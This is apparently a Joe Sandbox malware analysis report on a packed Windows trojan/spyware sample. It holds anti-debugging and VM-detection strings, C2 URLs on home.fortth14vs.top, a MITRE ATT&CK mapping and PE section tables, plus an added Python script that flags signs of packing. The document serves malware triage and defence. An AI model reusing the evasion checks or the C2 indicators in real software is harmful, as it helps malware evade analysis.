Source: TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpd
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_079404BA Start: 0794066B End: 079405EA 0_2_079404BA
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | File opened: NTICE
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | File opened: SICE
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00D79980 rdtsc 0_2_00D79980
Source: TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oVv)SProgram Manager
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Vv)SProgram Manager
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.5:49706 -> 34.147.147.173:80
MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the counts shown in the report for that technique):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
TX5LAYBZRI.exe | 47% | Virustotal |
TX5LAYBZRI.exe | 100% | Avira | TR/Crypt.TPM.Gen
TX5LAYBZRI.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZ | 100% | Avira URL Cloud | malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fortth14vs.top | 34.147.147.173 | true | false | | high
httpbin.org | 34.200.57.114 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: malware | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: malware | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | TX5LAYBZRI.exe | false | | high
https://httpbin.org/ipbefore | TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/http-cookies.html | TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/hsts.html# | TX5LAYBZRI.exe | false | | high
http://home.fortth14vs.top/gduZ | TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://curl.se/docs/http-cookies.html# | TX5LAYBZRI.exe | false | | high
https://curl.se/docs/alt-svc.html | TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse | TX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
34.147.147.173 | home.fortth14vs.top | United States | 2686 | ATGS-MMD-AS | false
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AES | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582833
                            Start date and time:2024-12-31 15:46:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:TX5LAYBZRI.exe
                            renamed because original name is a hash value
                            Original Sample Name:94dfcba69551e571570208f53fac90d6.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 51%
                            • Number of executed functions: 139
                            • Number of non-executed functions: 51
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.147.147.173 | XJiB3BdLTg.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.147.147.173 | Bo6uO5gKL4.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.200.57.114 | joE9s9sbv0.exe | malicious | Unknown |
34.200.57.114 | Bo6uO5gKL4.exe | malicious | Unknown |
34.200.57.114 | JbN2WYseAr.exe | malicious | Unknown |
34.200.57.114 | r8nllkNEQX.exe | malicious | Unknown |
34.200.57.114 | ivHDHq51Ar.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fortth14vs.top | XJiB3BdLTg.exe | malicious | Unknown | 34.147.147.173
home.fortth14vs.top | Bo6uO5gKL4.exe | malicious | Unknown | 34.147.147.173
home.fortth14vs.top | r8nllkNEQX.exe | malicious | Unknown | 91.149.241.220
home.fortth14vs.top | yqUQPPp0LM.exe | malicious | Unknown | 91.149.241.220
home.fortth14vs.top | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
home.fortth14vs.top | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
httpbin.org | Prs9eAnu2k.exe | malicious | Unknown | 34.197.122.172
httpbin.org | joE9s9sbv0.exe | malicious | Unknown | 34.200.57.114
httpbin.org | XJiB3BdLTg.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114
httpbin.org | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
httpbin.org | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
httpbin.org | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
httpbin.org | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
httpbin.org | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AES | Prs9eAnu2k.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES | joE9s9sbv0.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES | XJiB3BdLTg.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES | Bo6uO5gKL4.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES | JbN2WYseAr.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES | r8nllkNEQX.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
AMAZON-AES | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
AMAZON-AES | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
ATGS-MMD-AS | XJiB3BdLTg.exe | malicious | Unknown | 34.147.147.173
ATGS-MMD-AS | Bo6uO5gKL4.exe | malicious | Unknown | 34.147.147.173
ATGS-MMD-AS | http://usps.com-trackaddn.top/l | malicious | Unknown | 34.54.88.138
ATGS-MMD-AS | cbr.x86.elf | malicious | Mirai | 57.13.227.38
ATGS-MMD-AS | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 34.36.178.232
ATGS-MMD-AS | kwari.ppc.elf | malicious | Unknown | 48.233.101.215
ATGS-MMD-AS | kwari.arm.elf | malicious | Unknown | 57.204.182.195
ATGS-MMD-AS | kwari.mpsl.elf | malicious | Unknown | 57.206.149.213
ATGS-MMD-AS | kwari.arm7.elf | malicious | Mirai | 34.31.161.194
ATGS-MMD-AS | https://tepco-jp-lin;.%5Dshop/co/tepco | malicious | Unknown | 57.182.72.119
No context
                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.986149120630873
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: TX5LAYBZRI.exe
File size: 4'485'632 bytes
MD5: 94dfcba69551e571570208f53fac90d6
SHA1: 2280c39c446cef46be9388ff3124f6e9c61f7622
SHA256: 41e22386a926fc18dbc6d5a3b37fb560463965dd7539c9cf0b67974dd69882fe
SHA512: 1d84b9c68c28f9c412bc5449479b9c01ae3295e1797a47d0d7d8907194645de0652d49d3697a4ad925c2c6e466bc1fa9fcb295b2bc4209c40ca2c10d9bfd8f73
SSDEEP: 49152:Az0ymb9cp4eo2VoIRjdQn6f+Bmk8l4wQiF1IMGl/J8xoxeSKcC5wzGgtYWpgBex9:AA7OLoijKG3WwQizIi2xeSH7pV1RAT
TLSH: 522633358EF14D4FF44E833351EE9463BA73568007332F2EA8F8A0559D22957636E86B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@..................................;E...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x109d000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                      Signature Valid:
                                      Signature Issuer:
                                      Signature Validation Error:
                                      Error Number:
                                      Not Before, Not After
                                        Subject Chain
                                          Version:
                                          Thumbprint MD5:
                                          Thumbprint SHA-1:
                                          Thumbprint SHA-256:
                                          Serial:
                                          Instruction
                                          jmp 00007FF108B5CE5Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc9b338 | 0x10 | abkqriqx
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc9b2e8 | 0x18 | abkqriqx
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty name) | 0x1000 | 0x74a000 | 0x289000 | ef50d79a971a369dba13f9e89eee708e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x74b000 | 0x2b0 | 0x200 | 053f6048d9fd24083ba2fb62a1447dca | False | 0.796875 | data | 6.039196428779676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty name) | 0x74d000 | 0x394000 | 0x200 | 30abfd99a24924817bb3eef2542f1a75 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
abkqriqx | 0xae1000 | 0x1bb000 | 0x1ba600 | 365756304dcc6c59d6f61e0a1693c46d | False | 0.9942570729725911 | data | 7.95457753765941 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
csfzocsp | 0xc9c000 | 0x1000 | 0x400 | 625a4cfe52f6153c8003a9c63f86f870 | False | 0.80859375 | data | 6.294237469572895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc9d000 | 0x3000 | 0x2200 | 044b6e5bad2ad6f267d681473709d6b5 | False | 0.0646829044117647 | DOS executable (COM) | 0.7499271449084802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
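Read together, the directory and section tables above describe a packed binary rather than a compiler's output. The entry point 0x109d000 minus the image base 0x400000 is RVA 0xc9d000, the first byte of the last section, .taggant, not of a .text section. The code-bearing sections carry random names (abkqriqx, csfzocsp) or no name at all, every one of them is readable, writable and executable, and abkqriqx has an entropy of 7.95 over about 1.8 MB of raw data, which is what a compressed or encrypted payload looks like. The two unnamed sections reserve far more virtual memory (0x74a000 and 0x394000 bytes) than they occupy on disk (0x289000 and 0x200), the room an unpacker needs to write out the real program. One further check is worth making: IMAGE_DIRECTORY_ENTRY_SECURITY is stored as a file offset rather than an RVA, and here it points at 0x778200 with size 0x688, beyond the end of a 4'485'632-byte (0x447200) file; that is why "Digitally signed: true" is followed by an empty signature block, and the flag should not be read as a verified signature. The script below is an added example, not Joe Sandbox's code; it reproduces those heuristics with a hand-written PE32 header walk (no third-party module), runs on a constructed image modelled on this section layout, and its functions accept the bytes of a real file unchanged. The entropy cut-off of 7.0, the 64 KiB "virtual slack" margin and the list of standard section names are assumptions of the example.

```python
import hashlib
import math
import struct
from collections import Counter

# IMAGE_SCN_* characteristic bits (winnt.h)
SCN_INITIALIZED_DATA, SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x40, 0x20000000, 0x40000000, 0x80000000
RWX = SCN_EXECUTE | SCN_READ | SCN_WRITE
# Names an ordinary MSVC/MinGW link emits (assumed list); anything else deserves a look.
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".debug"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe32(pe: bytes):
    """Hand-rolled header walk: returns (entry_rva, sections, (security_offset, security_size))."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                          # IMAGE_OPTIONAL_HEADER32
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]         # AddressOfEntryPoint
    security = struct.unpack_from("<II", pe, opt + 96 + 4 * 8)    # DataDirectory[4] = SECURITY
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])})
    return entry_rva, sections, security


def triage_sections(pe: bytes, entropy_threshold: float = 7.0, slack: int = 0x10000):
    """Apply the packer heuristics behind the report's section table; returns [(name, [flags])]."""
    entry_rva, sections, _ = parse_pe32(pe)
    result = []
    for s in sections:
        flags = []
        if s["name"] not in STANDARD_SECTION_NAMES:
            flags.append("nonstandard-name")
        if s["chars"] & RWX == RWX:
            flags.append("rwx")
        if s["entropy"] >= entropy_threshold:            # assumed cut-off
            flags.append("high-entropy")                 # compressed or encrypted payload
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            flags.append("contains-entry-point")         # execution starts in a stub, not in .text
        if s["vsize"] > s["raw_size"] + slack:
            flags.append("virtual-slack")                # unbacked memory for an unpacker to fill
        result.append((s["name"], flags))
    return result


def check_security_directory(pe: bytes):
    """(offset, size, inside_file): the entry is a raw file offset, so it must lie within the file."""
    _, _, (offset, size) = parse_pe32(pe)
    return offset, size, size > 0 and offset + size <= len(pe)


def _filler(n: int) -> bytes:
    """Deterministic high-entropy bytes (SHA-256 chain) standing in for packed data."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the analysed sample), laid out like its section table."""
    specs = [  # name, raw bytes, VirtualSize, Characteristics
        (b".idata", b"kernel32.dll\0lstrcpy\0", 0x1000, SCN_INITIALIZED_DATA | SCN_READ | SCN_WRITE),
        (b"", b"\0" * 0x200, 0x100000, SCN_INITIALIZED_DATA | RWX),          # tiny on disk, huge in memory
        (b"abkqriqx", _filler(0x4000), 0x4000, SCN_INITIALIZED_DATA | RWX),  # packed payload
        (b".taggant", b"\xe9\0\0\0\0", 0x3000, SCN_INITIALIZED_DATA | RWX),  # entry-point stub
    ]
    file_align, sect_align = 0x200, 0x1000
    data_start = raw_ptr = -(-(0x40 + 24 + 0xE0 + 40 * len(specs)) // file_align) * file_align
    va, entry_rva, headers, body = sect_align, 0, bytearray(), bytearray()
    for name, raw, vsize, chars in specs:
        raw_size = -(-len(raw) // file_align) * file_align
        if name == b".taggant":
            entry_rva = va
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-max(vsize, raw_size) // sect_align) * sect_align
    dos = bytearray(b"MZ").ljust(0x40, b"\0")
    struct.pack_into("<I", dos, 0x3C, 0x40)                               # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 0xE0, 0x0102)  # i386, EXECUTABLE|32BIT
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<III", opt, 28, 0x400000, sect_align, file_align)   # ImageBase, alignments
    struct.pack_into("<I", opt, 92, 16)                                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 4 * 8, 0x778200, 0x688)             # security dir past EOF, as in the report
    return bytes((dos + b"PE\0\0" + file_hdr + opt + headers).ljust(data_start, b"\0") + body)
```

On the constructed image `triage_sections` leaves `.idata` clean, flags the unnamed section as nonstandard, RWX and virtual-slack, flags `abkqriqx` as nonstandard, RWX and high-entropy, and reports the entry point inside `.taggant`; `check_security_directory` returns `(0x778200, 0x688, False)`. Against the real file the same calls would report the seven sections of the table above with the same flags, because the sample's security directory also lies past its 0x447200-byte end.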
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc9b348 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
